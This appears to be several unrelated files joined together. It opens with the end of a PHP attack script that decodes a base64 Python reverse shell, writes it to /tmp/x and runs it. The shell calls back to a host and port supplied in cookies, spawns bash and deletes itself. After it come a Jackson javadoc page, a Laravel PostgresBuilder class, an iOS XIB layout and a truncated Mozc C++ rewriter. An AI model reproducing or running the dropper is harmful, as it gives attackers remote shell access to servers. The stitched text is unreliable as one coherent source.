$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
$shell =
"IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK";
$x = fopen("/tmp/x", "w+");
fwrite($x, base64_decode($shell));
fclose($x);
echo "{+} Shell dropped... Triggering...\n";
system("python /tmp/x ".$cbhost." ".$cbport);
die('{+} got shell?'); // payload should have rm'd itself
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0) on Sun Jul 19 11:36:55 PDT 2015 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Uses of Class com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver (jackson-databind 2.6.0 API)</title>
<meta name="date" content="2015-07-19">
<link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver (jackson-databind 2.6.0 API)";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?com/fasterxml/jackson/databind/module/class-use/SimpleAbstractTypeResolver.html" target="_top">Frames</a></li>
<li><a href="SimpleAbstractTypeResolver.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver" class="title">Uses of Class<br>com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#com.fasterxml.jackson.databind.module">com.fasterxml.jackson.databind.module</a></td>
<td class="colLast">
<div class="block">Package that contains classes and interfaces to help implement
custom extension <a href="../../../../../../com/fasterxml/jackson/databind/Module.html" title="class in com.fasterxml.jackson.databind"><code>Module</code></a>s
(which are registered using
<a href="../../../../../../com/fasterxml/jackson/databind/ObjectMapper.html#registerModule-com.fasterxml.jackson.databind.Module-"><code>ObjectMapper.registerModule(com.fasterxml.jackson.databind.Module)</code></a>.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="com.fasterxml.jackson.databind.module">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a> in <a href="../../../../../../com/fasterxml/jackson/databind/module/package-summary.html">com.fasterxml.jackson.databind.module</a></h3>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing fields, and an explanation">
<caption><span>Fields in <a href="../../../../../../com/fasterxml/jackson/databind/module/package-summary.html">com.fasterxml.jackson.databind.module</a> declared as <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Field and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>protected <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></code></td>
<td class="colLast"><span class="typeNameLabel">SimpleModule.</span><code><span class="memberNameLink"><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleModule.html#Z:Z_abstractTypes">_abstractTypes</a></span></code>
<div class="block">Lazily-constructed resolver used for storing mappings from
abstract classes to more specific implementing classes
(which may be abstract or concrete)</div>
</td>
</tr>
</tbody>
</table>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../../com/fasterxml/jackson/databind/module/package-summary.html">com.fasterxml.jackson.databind.module</a> that return <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code><T> <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></code></td>
<td class="colLast"><span class="typeNameLabel">SimpleAbstractTypeResolver.</span><code><span class="memberNameLink"><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html#addMapping-java.lang.Class-java.lang.Class-">addMapping</a></span>(<a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Class.html?is-external=true" title="class or interface in java.lang">Class</a><T> superType,
<a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Class.html?is-external=true" title="class or interface in java.lang">Class</a><? extends T> subType)</code>
<div class="block">Method for adding a mapping from super type to specific subtype.</div>
</td>
</tr>
</tbody>
</table>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../../com/fasterxml/jackson/databind/module/package-summary.html">com.fasterxml.jackson.databind.module</a> with parameters of type <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><span class="typeNameLabel">SimpleModule.</span><code><span class="memberNameLink"><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleModule.html#setAbstractTypes-com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver-">setAbstractTypes</a></span>(<a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a> atr)</code>
<div class="block">Resets currently configured abstract type mappings</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?com/fasterxml/jackson/databind/module/class-use/SimpleAbstractTypeResolver.html" target="_top">Frames</a></li>
<li><a href="SimpleAbstractTypeResolver.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>Copyright © 2014–2015 <a href="http://fasterxml.com/">FasterXML</a>. All rights reserved.</small></p>
</body>
</html>
<?php
namespace Illuminate\Database\Schema;
class PostgresBuilder extends Builder
{
/**
* Determine if the given table exists.
*
* @param string $table
* @return bool
*/
public function hasTable($table)
{
[$schema, $table] = $this->parseSchemaAndTable($table);
$table = $this->connection->getTablePrefix().$table;
return count($this->connection->select(
$this->grammar->compileTableExists(), [$schema, $table]
)) > 0;
}
/**
* Drop all tables from the database.
*
* @return void
*/
public function dropAllTables()
{
$tables = [];
$excludedTables = ['spatial_ref_sys'];
foreach ($this->getAllTables() as $row) {
$row = (array) $row;
$table = reset($row);
if (! in_array($table, $excludedTables)) {
$tables[] = $table;
}
}
if (empty($tables)) {
return;
}
$this->connection->statement(
$this->grammar->compileDropAllTables($tables)
);
}
/**
* Drop all views from the database.
*
* @return void
*/
public function dropAllViews()
{
$views = [];
foreach ($this->getAllViews() as $row) {
$row = (array) $row;
$views[] = reset($row);
}
if (empty($views)) {
return;
}
$this->connection->statement(
$this->grammar->compileDropAllViews($views)
);
}
/**
* Get all of the table names for the database.
*
* @return array
*/
protected function getAllTables()
{
return $this->connection->select(
$this->grammar->compileGetAllTables($this->connection->getConfig('schema'))
);
}
/**
* Get all of the view names for the database.
*
* @return array
*/
protected function getAllViews()
{
return $this->connection->select(
$this->grammar->compileGetAllViews($this->connection->getConfig('schema'))
);
}
/**
* Get the column listing for a given table.
*
* @param string $table
* @return array
*/
public function getColumnListing($table)
{
[$schema, $table] = $this->parseSchemaAndTable($table);
$table = $this->connection->getTablePrefix().$table;
$results = $this->connection->select(
$this->grammar->compileColumnListing(), [$schema, $table]
);
return $this->connection->getPostProcessor()->processColumnListing($results);
}
/**
* Parse the table name and extract the schema and table.
*
* @param string $table
* @return array
*/
protected function parseSchemaAndTable($table)
{
$table = explode('.', $table);
if (is_array($schema = $this->connection->getConfig('schema'))) {
if (in_array($table[0], $schema)) {
return [array_shift($table), implode('.', $table)];
}
$schema = head($schema);
}
return [$schema ?: 'public', implode('.', $table)];
}
}
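/*
 * Editor's sketch (illustrative, not part of the class): minimal usage,
 * assuming a Laravel application with a configured "pgsql" connection whose
 * 'schema' config lists 'reporting'. All names below are examples only.
 *
 *   use Illuminate\Support\Facades\Schema;
 *
 *   // parseSchemaAndTable() splits "reporting.users" into
 *   // ['reporting', 'users']; without a prefix the schema defaults to 'public'.
 *   if (Schema::connection('pgsql')->hasTable('reporting.users')) {
 *       $columns = Schema::connection('pgsql')->getColumnListing('reporting.users');
 *   }
 */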
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.XIB" version="3.0" toolsVersion="9532" systemVersion="15B42" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES">
<dependencies>
<deployment identifier="iOS"/>
<plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="9530"/>
</dependencies>
<objects>
<placeholder placeholderIdentifier="IBFilesOwner" id="-1" userLabel="File's Owner"/>
<placeholder placeholderIdentifier="IBFirstResponder" id="-2" customClass="UIResponder"/>
<view contentMode="scaleToFill" id="iN0-l3-epB" customClass="XFContentVoiceView">
<rect key="frame" x="0.0" y="0.0" width="384" height="256"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" translatesAutoresizingMaskIntoConstraints="NO" id="wOM-RW-NBc">
<rect key="frame" x="0.0" y="0.0" width="384" height="243"/>
</imageView>
<button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="1Zt-hv-Mj3">
<rect key="frame" x="162" y="196" width="60" height="60"/>
<constraints>
<constraint firstAttribute="width" constant="60" id="Zyd-fc-Nwp"/>
<constraint firstAttribute="height" constant="60" id="nNi-YZ-J9O"/>
</constraints>
<state key="normal" image="playButtonPlay" backgroundImage="playButton"/>
<connections>
<action selector="playBtn:" destination="iN0-l3-epB" eventType="touchUpInside" id="Zg1-Zf-vFn"/>
</connections>
</button>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="08:52" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="suj-YQ-pqU">
<rect key="frame" x="344" y="227" width="40" height="16"/>
<color key="backgroundColor" white="0.0" alpha="0.5" colorSpace="calibratedWhite"/>
<constraints>
<constraint firstAttribute="height" constant="16" id="ArB-R6-N6N"/>
<constraint firstAttribute="width" constant="40" id="CVs-pm-auK"/>
</constraints>
<fontDescription key="fontDescription" type="system" pointSize="13"/>
<color key="textColor" red="1" green="1" blue="1" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="9999播放" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="o1d-eC-UW8">
<rect key="frame" x="0.0" y="227" width="80" height="16"/>
<color key="backgroundColor" white="0.0" alpha="0.5" colorSpace="calibratedWhite"/>
<constraints>
<constraint firstAttribute="width" constant="80" id="D7c-mR-zvU"/>
<constraint firstAttribute="height" constant="16" id="Tu4-gm-qKn"/>
</constraints>
<fontDescription key="fontDescription" type="system" pointSize="13"/>
<color key="textColor" red="1" green="1" blue="1" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
<imageView userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="imageBackground" translatesAutoresizingMaskIntoConstraints="NO" id="2c9-Ff-2Pr">
<rect key="frame" x="0.0" y="15" width="384" height="25"/>
<constraints>
<constraint firstAttribute="height" constant="25" id="9OY-Nw-I1p"/>
</constraints>
</imageView>
</subviews>
<color key="backgroundColor" white="1" alpha="1" colorSpace="custom" customColorSpace="calibratedWhite"/>
<constraints>
<constraint firstAttribute="bottom" secondItem="wOM-RW-NBc" secondAttribute="bottom" constant="13" id="5mH-zj-8Hd"/>
<constraint firstItem="suj-YQ-pqU" firstAttribute="bottom" secondItem="wOM-RW-NBc" secondAttribute="bottom" id="9AF-Mi-QHr"/>
<constraint firstAttribute="bottom" secondItem="1Zt-hv-Mj3" secondAttribute="bottom" id="Fmv-Za-g17"/>
<constraint firstItem="suj-YQ-pqU" firstAttribute="trailing" secondItem="wOM-RW-NBc" secondAttribute="trailing" id="Ho5-UF-f58"/>
<constraint firstItem="2c9-Ff-2Pr" firstAttribute="leading" secondItem="iN0-l3-epB" secondAttribute="leading" id="LLO-AQ-qHV"/>
<constraint firstItem="2c9-Ff-2Pr" firstAttribute="top" secondItem="iN0-l3-epB" secondAttribute="top" constant="15" id="M51-OS-OIy"/>
<constraint firstItem="wOM-RW-NBc" firstAttribute="leading" secondItem="iN0-l3-epB" secondAttribute="leading" id="PEv-QX-FX9"/>
<constraint firstAttribute="trailing" secondItem="wOM-RW-NBc" secondAttribute="trailing" id="U3M-sW-CuU"/>
<constraint firstItem="o1d-eC-UW8" firstAttribute="top" secondItem="wOM-RW-NBc" secondAttribute="bottom" constant="-16" id="UW3-Fm-CFX"/>
<constraint firstAttribute="trailing" secondItem="2c9-Ff-2Pr" secondAttribute="trailing" id="WW2-mz-BMq"/>
<constraint firstItem="wOM-RW-NBc" firstAttribute="top" secondItem="iN0-l3-epB" secondAttribute="top" id="b1n-tE-v0V"/>
<constraint firstItem="o1d-eC-UW8" firstAttribute="leading" secondItem="wOM-RW-NBc" secondAttribute="leading" id="c9p-FI-aAG"/>
<constraint firstItem="1Zt-hv-Mj3" firstAttribute="centerX" secondItem="iN0-l3-epB" secondAttribute="centerX" id="ify-Vd-Kql"/>
</constraints>
<nil key="simulatedStatusBarMetrics"/>
<freeformSimulatedSizeMetrics key="simulatedDestinationMetrics"/>
<connections>
<outlet property="imageView" destination="wOM-RW-NBc" id="Zdv-4S-scd"/>
<outlet property="playBtn" destination="1Zt-hv-Mj3" id="XWc-t6-5Tw"/>
<outlet property="playCount" destination="o1d-eC-UW8" id="WZb-SL-iPJ"/>
<outlet property="playTime" destination="suj-YQ-pqU" id="w8D-GJ-IhA"/>
</connections>
<point key="canvasLocation" x="580" y="219"/>
</view>
</objects>
<resources>
<image name="imageBackground" width="75" height="15"/>
<image name="playButton" width="63" height="63"/>
<image name="playButtonPlay" width="30" height="30"/>
</resources>
</document>
// Copyright 2010-2020, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#include "rewriter/collocation_rewriter.h"
#include <algorithm>
#include <memory>
#include <string>
#include <vector>
#include "base/flags.h"
#include "base/hash.h"
#include "base/logging.h"
#include "base/util.h"
#include "converter/segments.h"
#include "data_manager/data_manager_interface.h"
#include "dictionary/pos_matcher.h"
#include "request/conversion_request.h"
#include "rewriter/collocation_util.h"
#include "storage/existence_filter.h"
#include "absl/strings/str_cat.h"
#include "absl/strings/string_view.h"
DEFINE_bool(use_collocation, true, "use collocation rewrite");
namespace mozc {
using mozc::storage::ExistenceFilter;
namespace {
const size_t kCandidateSize = 12;
const int kMaxCostDiff = 3453; // -500*log(1/1000)
// For collocation, we use two segments.
enum SegmentLookupType {
LEFT,
RIGHT,
};
// Returns true if the given string contains a number, including Kanji numerals.
bool ContainsNumber(const std::string &str) {
for (ConstChar32Iterator iter(str); !iter.Done(); iter.Next()) {
if (CollocationUtil::IsNumber(iter.Get())) {
return true;
}
}
return false;
}
// Returns true if value matches the pattern XXXPPPYYY, where XXX is a Kanji
// sequence, PPP is the given pattern, and YYY is a sequence containing at least
// one Kanji character. If the value matches the pattern, XXX and YYY are
// stored in |first_content| and |second|, respectively. Returns false if
// the value isn't of the form XXXPPPYYY.
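// For example, with value = "本を読む" and pattern = "を", |first_content|
// becomes "本" and |second| becomes "読む" (illustrative).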
bool ParseCompound(const absl::string_view value,
const absl::string_view pattern,
absl::string_view *first_content,
absl::string_view *second) {
DCHECK(!value.empty());
DCHECK(!pattern.empty());
// Find the |first_content| candidate and check if it consists of Kanji only.
absl::string_view::const_iterator pattern_begin =
std::find(value.begin(), value.end(), pattern[0]);
if (pattern_begin == value.end()) {
return false;
}
*first_content = absl::string_view(
value.data(), std::distance(value.begin(), pattern_begin));
if (!Util::IsScriptType(*first_content, Util::KANJI)) {
return false;
}
// Check if the middle part matches |pattern|.
const absl::string_view remaining_value =
absl::ClippedSubstr(value, first_content->size());
if (!Util::StartsWith(remaining_value, pattern)) {
return false;
}
// Check if the last substring is eligible for |second|.
*second = absl::ClippedSubstr(remaining_value, pattern.size());
if (second->empty() || !Util::ContainsScriptType(*second, Util::KANJI)) {
return false;
}
// Just verify that |value| = |first_content| + |pattern| + |second|.
DCHECK_EQ(value, std::string(*first_content) + std::string(pattern) +
std::string(*second));
return true;
}
// A helper function to push back a string view to a vector.
inline void PushBackStringView(const absl::string_view s,
std::vector<std::string> *v) {
v->emplace_back(s.data(), s.size());
}
// Handles a compound such as "本を読む" (one segment).
// We want to rewrite it as if it were "<本|を><読む>"
// so that we can use collocation data like "厚い本".
void ResolveCompoundSegment(const std::string &top_value,
const std::string &value, SegmentLookupType type,
std::vector<std::string> *output) {
// see "http://ja.wikipedia.org/wiki/助詞"
static const char kPat1[] = "が";
// "の" was not good...
// static const char kPat2[] = "の";
static const char kPat3[] = "を";
static const char kPat4[] = "に";
static const char kPat5[] = "へ";
static const char kPat6[] = "と";
static const char kPat7[] = "から";
static const char kPat8[] = "より";
static const char kPat9[] = "で";
static const struct {
const char *pat;
size_t len;
} kParticles[] = {{kPat1, arraysize(kPat1) - 1},
// {kPat2, arraysize(kPat2) - 1},
{kPat3, arraysize(kPat3) - 1},
{kPat4, arraysize(kPat4) - 1},
{kPat5, arraysize(kPat5) - 1},
{kPat6, arraysize(kPat6) - 1},
{kPat7, arraysize(kPat7) - 1},
{kPat8, arraysize(kPat8) - 1},
{kPat9, arraysize(kPat9) - 1},
{NULL, 0}};
for (size_t i = 0; kParticles[i].pat != NULL; ++i) {
const absl::string_view particle(kParticles[i].pat, kParticles[i].len);
absl::string_view first_content, second;
if (!ParseCompound(top_value, particle, &first_content, &second)) {
continue;
}
if (ParseCompound(value, particle, &first_content, &second)) {
if (type == LEFT) {
output->emplace_back(second.data(), second.size());
output->push_back(absl::StrCat(first_content, particle));
} else {
output->emplace_back(first_content.data(), first_content.size());
}
return;
}
}
}
bool IsNaturalContent(const Segment::Candidate &cand,
const Segment::Candidate &top_cand,
SegmentLookupType type,
std::vector<std::string> *output) {
const std::string &content = cand.content_value;
const std::string &value = cand.value;
const std::string &top_content = top_cand.content_value;
const std::string &top_value = top_cand.value;
const size_t top_content_len = Util::CharsLen(top_content);
const size_t content_len = Util::CharsLen(content);
if (type == RIGHT && value != top_value && top_content_len >= 2 &&
content_len == 1) {
return false;
}
if (type == LEFT) {
output->push_back(value);
} else {
output->push_back(content);
// "舞って" workaround
// V+"て" is often treated as one compound.
static const char kPat[] = "て";
if (Util::EndsWith(content, absl::string_view(kPat, arraysize(kPat) - 1))) {
PushBackStringView(Util::Utf8SubString(content, 0, content_len - 1),
output);
}
}
// we don't rewrite NUMBER to others and vice versa
if (ContainsNumber(value) != ContainsNumber(top_value)) {
return false;
}
const absl::string_view top_aux_value =
Util::Utf8SubString(top_value, top_content_len, std::string::npos);
const size_t top_aux_value_len = Util::CharsLen(top_aux_value);
const Util::ScriptType top_value_script_type = Util::GetScriptType(top_value);
// we don't rewrite KATAKANA segment
// for example, we don't rewrite "コーヒー飲みます" to "珈琲飲みます"
if (type == LEFT && top_aux_value_len == 0 && top_value != value &&
top_value_script_type == Util::KATAKANA) {
return false;
}
// special cases
if (top_content_len == 1) {
const char *begin = top_content.data();
const char *end = top_content.data() + top_content.size();
size_t mblen = 0;
const char32 wchar = Util::UTF8ToUCS4(begin, end, &mblen);
switch (wchar) {
case 0x304a: // "お"
case 0x5fa1: // "御"
case 0x3054: // "ご"
return true;
default:
break;
}
}
const absl::string_view aux_value =
Util::Utf8SubString(value, content_len, std::string::npos);
// Remove number in normalization for the left segment.
std::string aux_normalized, top_aux_normalized;
CollocationUtil::GetNormalizedScript(aux_value, (type == LEFT),
&aux_normalized);
